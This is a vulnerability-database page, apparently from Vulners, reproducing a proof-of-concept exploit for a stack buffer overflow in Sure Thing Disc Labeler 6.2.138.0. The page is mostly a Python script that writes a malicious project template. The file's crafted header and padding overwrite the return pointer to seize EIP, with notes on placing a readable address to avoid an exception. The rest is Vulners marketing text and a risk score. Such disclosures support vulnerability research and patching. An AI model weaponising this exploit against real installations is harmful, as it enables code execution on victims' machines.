Vulners
Lucene search
Sure Thing Disc Labeler 6.2.138.0 - Buffer Overflow (PoC)
# Exploit Title: Sure Thing Disc Labeler - Stack Buffer Overflow (PoC)
# Date: 5-19-17
# Exploit Author: Chance Johnson ([email protected])
# Vendor Homepage: http://www.surething.com/
# Software Link: http://www.surething.com/disclabeler
# Version: 6.2.138.0
# Tested on: Windows 7 x64 / Windows 10
#
# Usage:
# Open the project template generated by this script.
# If a readable address is placed in AVread, no exception will be thrown
# and a return pointer will be overwritten giving control over EIP when
# the function returns.
header = '\x4D\x56\x00\xFF\x0C\x00\x12\x00\x32\x41\x61\x33\x08\x00\x5E\x00'
header += '\x61\x35\x41\x61\x36\x41\x61\x37\x41\x61\x38\x41\x61\x39\x41\x62'
header += '\x30\x41\x62\x31\x41\x62\x32\x41\x62\x33\x41\x62\x34\x41\x62\x35'
header += '\x41\x62\x36\x41\x78\x37\x41\x62\x38\x41\x62\x39\x41\x63\x30\x41'
header += '\x0C\x00\x41\x63\x78\x1F\x00\x00\x41\x63\x34\x41\x63\x35\x41\x63'
junk1 = 'D'*10968
EIP = 'A'*4 # Direct RET overwrite
junk2 = 'D'*24
AVread = 'B'*4 # address of any readable memory
junk3 = 'D'*105693
buf = header + junk1 + EIP + junk2 + AVread + junk3
print "[+] Creating file with %d bytes..." % len(buf)
f=open("exp.std",'wb')
f.write(buf)
f.close()Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
19 May 2017 00:00Current
7.4High risk
Vulners AI Score7.4